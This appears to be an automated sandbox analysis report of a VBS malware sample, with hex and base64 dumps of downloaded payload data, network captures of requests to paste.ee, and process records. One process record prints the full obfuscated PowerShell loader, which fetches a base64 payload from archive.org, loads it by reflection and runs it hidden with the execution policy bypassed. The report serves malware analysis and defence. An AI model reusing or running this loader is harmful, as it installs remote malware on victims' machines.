                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                      Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                      2024-09-26 08:58:04 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                      Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                      2024-09-26 08:58:04 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                      Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                      2024-09-26 08:58:04 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                      Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.649712188.114.97.34436784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:58:06 UTC67OUTGET /d/WksSo/0 HTTP/1.1
                                      Host: paste.ee
                                      Connection: Keep-Alive
                                      2024-09-26 08:58:07 UTC1208INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:58:07 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Cache-Control: max-age=2592000
                                      strict-transport-security: max-age=63072000
                                      x-frame-options: DENY
                                      x-content-type-options: nosniff
                                      x-xss-protection: 1; mode=block
                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFeGSdcjcWLSbBQfAYs2wOzwbUehwS28Cp4gkumWgydo2MaMxadPSMUBZP%2B7vft9Cmy5pLADsbfvUFiuOe0U%2FNM%2FG2BLKmJo9ynpFr6Fi%2BXUpGqQAT8%2FX9dPtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920ce138a35e82-EWR
                                      2024-09-26 08:58:07 UTC161INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 6f 79 44 69 38 77 47 50 4d 78 44 4c 38 67 77 4f 38 76 44 33 37 41 37 4f 55 75 44 64 37 51 31 4f 77 73 44 45 36 77 75 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a
                                      Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPoyDi8wGPMxDL8gwO8vD37A7OUuDd7Q1OwsDE6wuOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQz
                                      2024-09-26 08:58:07 UTC1369INData Raw: 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 5a 4d 4d 47 44 69 78 67 58 4d 30 46 44 63 41 41 41 41 4d 43 77 42 51 41 41 41 41 34 44 70 2b 41 70 50 49 36 44 64 2b 77 6d 50 6b 35 44 58 2b 67 6c 50 51 35 44 50 2b 51 6a 50 67 34 44 47 2b 41 68 50 49 34 44 42 2b 41 51 50 38 33 44 2b 39 41 66 50 73 33 44 35 39 41 64 50 49 33 44 74 39 77 61 50 6b 32 44 6e 39 67 58 50 77 31 44 61 39 51 57 50 49 31 44 4b 39 51 53 50 49 77 44 36 38 67 4d 50 6f 79 44 69 38 67 47 50 49 78 44 4b 38 67 77 4f 6f 76 44 79 37 67 36 4f 49 75 44 61 37 67 30 4f 6f 73 44 43 36 67 75 4f 49 72 44 71 36 67
                                      Data Ascii: MwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgXM0FDcAAAAMCwBQAAAA4Dp+ApPI6Dd+wmPk5DX+glPQ5DP+QjPg4DG+AhPI4DB+AQP83D+9AfPs3D59AdPI3Dt9waPk2Dn9gXPw1Da9QWPI1DK9QSPIwD68gMPoyDi8gGPIxDK8gwOovDy7g6OIuDa7g0OosDC6guOIrDq6g
                                      2024-09-26 08:58:07 UTC1369INData Raw: 47 41 48 41 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61 78 41 57 4d 59 46 44 55 78 67 55 4d 41 46 44 4f 78 41 54 4d 6f 45 44 49 78 67 52 4d 51 45 44 43 78 41 41 4d 34 44 44 38 77 67 4f 4d 67 44 44 32 77 41 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44 71 77 41 4b
                                      Data Ascii: GAHAzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDaxAWMYFDUxgUMAFDOxATMoEDIxgRMQEDCxAAM4DD8wgOMgDD2wANMIDDwwgLMwCDqwAK
                                      2024-09-26 08:58:07 UTC1369INData Raw: 49 44 49 79 51 68 4d 49 45 44 2f 78 41 66 4d 6b 48 44 32 78 77 63 4d 41 48 44 74 78 67 61 4d 63 47 44 6b 78 51 59 4d 34 46 44 62 78 41 57 4d 55 46 44 53 78 77 54 4d 77 45 44 4a 78 67 52 4d 4d 45 44 41 77 51 50 4d 6f 44 44 33 77 41 4e 4d 45 44 44 75 77 77 4b 4d 67 43 44 6c 77 67 49 4d 38 42 44 63 77 51 47 4d 59 42 44 54 77 41 45 4d 30 41 44 4b 77 77 42 4d 51 41 44 42 41 41 77 41 34 42 67 42 41 41 41 41 41 38 44 2b 2f 77 2b 50 67 2f 44 31 2f 67 38 50 38 2b 44 73 2f 51 36 50 59 2b 44 6a 2f 41 34 50 30 39 44 61 2f 77 31 50 51 39 44 52 2f 67 7a 50 73 38 44 49 31 51 62 4e 77 57 44 72 31 67 4b 4e 47 52 6a 51 30 34 44 4e 36 41 41 41 41 41 45 41 46 41 50 41 41 41 41 50 38 79 44 75 38 51 4c 50 77 79 44 72 38 67 4b 50 6b 79 44 6f 38 77 4a 50 59 79 44 6c 38 41 4a 50
                                      Data Ascii: IDIyQhMIED/xAfMkHD2xwcMAHDtxgaMcGDkxQYM4FDbxAWMUFDSxwTMwEDJxgRMMEDAwQPMoDD3wANMEDDuwwKMgCDlwgIM8BDcwQGMYBDTwAEM0ADKwwBMQADBAAwA4BgBAAAAA8D+/w+Pg/D1/g8P8+Ds/Q6PY+Dj/A4P09Da/w1PQ9DR/gzPs8DI1QbNwWDr1gKNGRjQ04DN6AAAAAEAFAPAAAAP8yDu8QLPwyDr8gKPkyDo8wJPYyDl8AJP
                                      2024-09-26 08:58:07 UTC1369INData Raw: 44 77 77 67 4c 4d 77 43 44 71 77 41 4b 4d 59 43 44 6b 77 67 49 4d 41 43 44 65 77 41 48 4d 6f 42 44 59 77 67 46 4d 51 42 44 53 77 41 45 4d 34 41 44 4d 77 67 43 4d 67 41 44 47 77 41 42 4d 49 41 44 41 41 41 51 41 38 42 51 42 77 43 77 50 34 2f 44 38 2f 67 2b 50 67 2f 44 32 2f 41 39 50 49 2f 44 77 2f 67 37 50 77 2b 44 71 2f 41 36 50 59 2b 44 6b 2f 67 34 50 41 2b 44 65 2f 41 33 50 6f 39 44 59 2f 67 31 50 51 39 44 53 2f 41 30 50 34 38 44 4d 2f 67 79 50 67 38 44 47 2f 41 78 50 49 38 44 41 2b 67 76 50 77 37 44 36 2b 41 75 50 59 37 44 30 2b 67 73 50 41 37 44 75 2b 41 72 50 6f 36 44 70 2b 77 70 50 55 36 44 6a 2b 51 6f 50 38 35 44 64 2b 77 6d 50 6b 35 44 58 2b 51 6c 50 4d 35 44 52 2b 77 6a 50 30 34 44 4c 2b 51 69 50 63 34 44 46 2b 77 67 50 45 30 44 2f 39 51 66 50 73
                                      Data Ascii: DwwgLMwCDqwAKMYCDkwgIMACDewAHMoBDYwgFMQBDSwAEM4ADMwgCMgADGwABMIADAAAQA8BQBwCwP4/D8/g+Pg/D2/A9PI/Dw/g7Pw+Dq/A6PY+Dk/g4PA+De/A3Po9DY/g1PQ9DS/A0P48DM/gyPg8DG/AxPI8DA+gvPw7D6+AuPY7D0+gsPA7Du+ArPo6Dp+wpPU6Dj+QoP85Dd+wmPk5DX+QlPM5DR+wjP04DL+QiPc4DF+wgPE0D/9QfPs
                                      2024-09-26 08:58:07 UTC1369INData Raw: 66 31 67 58 4e 30 56 44 63 31 77 57 4e 6f 56 44 5a 31 41 57 4e 63 56 44 57 31 51 56 4e 51 56 44 54 31 67 55 4e 45 56 44 51 31 77 54 4e 34 55 44 4e 31 41 54 4e 73 55 44 4b 31 51 53 4e 67 55 44 48 31 67 52 4e 55 55 44 45 31 77 51 4e 49 55 44 42 30 77 50 41 41 45 41 63 41 55 41 6b 41 45 44 62 78 49 57 4d 59 46 6a 54 78 51 55 4d 36 45 44 4d 78 59 53 4d 63 45 6a 45 78 67 41 4d 2b 44 44 39 77 6f 4f 4d 67 44 6a 31 77 77 4d 4d 43 44 44 75 77 34 4b 4d 6b 43 6a 6d 77 41 4a 4d 47 43 44 66 77 49 48 4d 6a 42 54 57 77 38 45 4d 46 42 7a 4f 77 45 44 4d 6e 41 54 48 77 4d 42 4d 4a 41 41 41 41 41 46 41 46 41 49 41 2f 38 2f 50 31 2f 7a 36 2f 45 2b 50 58 2f 7a 77 2f 6b 37 50 76 2b 54 70 2f 6b 35 50 4f 2b 44 68 2f 6f 33 50 77 39 6a 5a 2f 77 31 50 53 39 44 53 2f 34 7a 50 79 38
                                      Data Ascii: f1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDB0wPAAEAcAUAkAEDbxIWMYFjTxQUM6EDMxYSMcEjExgAM+DD9woOMgDj1wwMMCDDuw4KMkCjmwAJMGCDfwIHMjBTWw8EMFBzOwEDMnATHwMBMJAAAAAFAFAIA/8/P1/z6/E+PX/zw/k7Pv+Tp/k5PO+Dh/o3Pw9jZ/w1PS9DS/4zPy8
                                      2024-09-26 08:58:07 UTC1065INData Raw: 30 77 49 4e 34 52 44 62 30 4d 79 4d 6a 50 44 30 7a 34 36 4d 49 4f 54 5a 7a 77 78 4d 58 4d 54 45 7a 77 67 4d 61 4c 7a 6a 79 67 6d 4d 30 45 6a 6f 78 38 59 4d 5a 46 6a 49 77 30 4f 4d 6b 44 6a 31 77 45 4d 4d 52 43 6a 65 77 38 47 4d 62 42 44 55 77 73 45 4d 71 41 41 41 41 77 4b 41 45 41 50 41 2f 30 66 50 72 33 44 30 39 67 5a 50 41 31 44 4d 39 59 53 50 5a 30 7a 44 39 41 41 50 6d 7a 7a 33 38 67 4e 50 52 7a 6a 6e 38 6b 49 50 45 79 7a 63 38 6b 47 50 4c 78 7a 4c 38 30 42 50 4c 73 44 2f 37 49 6f 4f 35 70 6a 55 35 63 65 4f 41 6e 7a 47 32 49 6c 4e 7a 55 54 78 31 6f 57 4e 4a 51 54 50 30 41 44 4e 6f 4d 7a 2b 79 55 73 4d 43 4b 54 59 79 6b 6c 4d 42 4a 54 4c 78 41 57 4d 78 41 54 77 77 59 48 4d 75 42 41 41 41 77 47 41 45 41 4f 41 2f 49 2f 50 72 2f 7a 71 2f 77 30 50 66 34 44
                                      Data Ascii: 0wIN4RDb0MyMjPD0z46MIOTZzwxMXMTEzwgMaLzjygmM0Ejox8YMZFjIw0OMkDj1wEMMRCjew8GMbBDUwsEMqAAAAwKAEAPA/0fPr3D09gZPA1DM9YSPZ0zD9AAPmzz38gNPRzjn8kIPEyzc8kGPLxzL80BPLsD/7IoO5pjU5ceOAnzG2IlNzUTx1oWNJQTP0ADNoMz+yUsMCKTYyklMBJTLxAWMxATwwYHMuBAAAwGAEAOA/I/Pr/zq/w0Pf4D
                                      2024-09-26 08:58:07 UTC1369INData Raw: 32 30 30 30 0d 0a 76 77 51 4c 4d 31 42 54 62 77 77 43 4d 68 41 41 41 41 77 4a 41 45 41 4a 41 41 41 77 50 4f 2f 44 79 2f 45 32 50 5a 39 7a 53 2f 4d 30 50 36 38 54 4d 2f 6b 79 50 68 38 54 47 2f 34 67 50 38 37 44 39 2b 67 75 50 67 37 7a 31 2b 34 73 50 47 37 6a 76 2b 59 72 50 75 36 54 6f 2b 55 70 50 4e 36 7a 54 2b 4d 53 50 33 33 44 30 39 6f 63 50 45 33 6a 76 39 59 62 50 79 32 7a 70 39 67 5a 50 4d 32 7a 65 39 38 57 50 64 31 54 4f 39 6f 53 50 63 77 6a 2b 38 55 50 50 77 7a 44 33 38 45 4e 50 38 79 7a 72 38 51 4b 50 31 78 7a 56 38 49 46 50 4e 78 6a 51 38 59 43 50 43 73 7a 7a 37 6f 38 4f 46 76 6a 75 37 6b 34 4f 6c 74 44 59 37 73 31 4f 51 74 44 4e 37 30 78 4f 43 6f 54 2f 36 67 76 4f 74 72 54 30 36 45 73 4f 67 71 7a 6d 36 59 70 4f 4c 71 54 61 36 63 6c 4f 35 6f 44 4e
                                      Data Ascii: 2000vwQLM1BTbwwCMhAAAAwJAEAJAAAwPO/Dy/E2PZ9zS/M0P68TM/kyPh8TG/4gP87D9+guPg7z1+4sPG7jv+YrPu6To+UpPN6zT+MSP33D09ocPE3jv9YbPy2zp9gZPM2ze98WPd1TO9oSPcwj+8UPPwzD38ENP8yzr8QKP1xzV8IFPNxjQ8YCPCszz7o8OFvju7k4OltDY7s1OQtDN70xOCoT/6gvOtrT06EsOgqzm6YpOLqTa6clO5oDN
                                      2024-09-26 08:58:07 UTC1369INData Raw: 59 4e 7a 56 54 47 30 59 38 4d 35 4b 7a 32 79 67 72 4d 49 47 7a 64 41 41 41 41 59 42 41 42 67 41 77 4f 54 63 54 78 33 67 36 4e 57 5a 44 38 31 67 64 4e 62 51 6a 34 30 77 4c 4e 41 4f 7a 6f 79 45 72 4d 41 47 6a 34 78 30 5a 4d 71 46 44 47 77 73 4f 4d 2b 43 44 44 41 41 41 41 77 41 41 42 51 41 41 41 41 38 7a 56 2f 63 53 50 5a 33 6a 6b 39 63 54 50 70 6f 54 38 36 55 43 4f 35 6a 54 61 34 4d 45 4f 6d 63 44 4e 32 34 55 4e 6e 58 44 31 31 45 61 4e 78 4a 7a 31 79 59 70 4d 31 4a 54 55 79 6f 6b 4d 46 46 54 31 78 6b 42 4d 4b 42 41 41 41 41 45 41 45 41 41 41 2f 59 35 50 52 2b 6a 63 2b 59 6e 50 56 35 54 4d 2b 6f 69 50 6c 30 44 75 38 77 4d 50 63 6d 44 51 35 59 6a 4d 33 4b 44 45 77 41 4f 4d 36 43 54 6e 41 41 41 41 73 41 77 41 77 44 41 41 41 38 7a 35 2f 73 38 50 79 39 44 57 35
                                      Data Ascii: YNzVTG0Y8M5Kz2ygrMIGzdAAAAYBABgAwOTcTx3g6NWZD81gdNbQj40wLNAOzoyErMAGj4x0ZMqFDGwsOM+CDDAAAAwAABQAAAA8zV/cSPZ3jk9cTPpoT86UCO5jTa4MEOmcDN24UNnXD11EaNxJz1yYpM1JTUyokMFFT1xkBMKBAAAAEAEAAA/Y5PR+jc+YnPV5TM+oiPl0Du8wMPcmDQ5YjM3KDEwAOM6CTnAAAAsAwAwDAAA8z5/s8Py9DW5
                                      2024-09-26 08:58:07 UTC1369INData Raw: 4d 76 41 54 4b 77 4d 43 4d 64 41 44 47 77 49 42 4d 4d 41 6a 42 77 45 41 41 41 45 41 47 41 4d 41 59 41 41 41 41 2f 73 2f 50 31 2f 7a 37 2f 6f 2b 50 6b 2f 6a 33 2f 67 39 50 54 2f 54 7a 2f 59 38 50 42 2f 44 76 2f 59 37 50 77 2b 6a 71 2f 55 36 50 66 2b 54 6d 2f 4d 35 50 4f 2b 44 69 2f 49 34 50 38 39 7a 64 2f 45 33 50 72 39 54 5a 2f 41 32 50 61 39 44 56 2f 34 30 50 4a 39 7a 51 2f 30 7a 50 33 38 6a 4d 2f 77 79 50 6d 38 44 49 2f 73 78 50 56 38 7a 44 2f 6b 77 50 45 34 6a 2f 2b 67 76 50 79 37 54 37 2b 63 75 50 68 37 7a 32 2b 59 74 50 51 37 6a 79 2b 51 73 50 2f 36 54 75 2b 4d 72 50 74 36 44 71 2b 49 71 50 63 36 6a 6c 2b 45 70 50 4c 36 54 68 2b 38 6e 50 36 35 44 64 2b 30 6d 50 6d 35 44 59 39 73 66 50 55 77 44 69 38 51 45 50 33 77 44 4d 38 6f 43 50 6b 77 7a 45 37 59
                                      Data Ascii: MvATKwMCMdADGwIBMMAjBwEAAAEAGAMAYAAAA/s/P1/z7/o+Pk/j3/g9PT/Tz/Y8PB/Dv/Y7Pw+jq/U6Pf+Tm/M5PO+Di/I4P89zd/E3Pr9TZ/A2Pa9DV/40PJ9zQ/0zP38jM/wyPm8DI/sxPV8zD/kwPE4j/+gvPy7T7+cuPh7z2+YtPQ7jy+QsP/6Tu+MrPt6Dq+IqPc6jl+EpPL6Th+8nP65Dd+0mPm5DY9sfPUwDi8QEP3wDM8oCPkwzE7Y


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:04:57:58
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                      Imagebase:0x7ff6303a0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:04:57:59
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                      Imagebase:0x7ff6e3d50000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:04:57:59
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff66e660000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:4
                                      Start time:04:58:01
                                      Start date:26/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
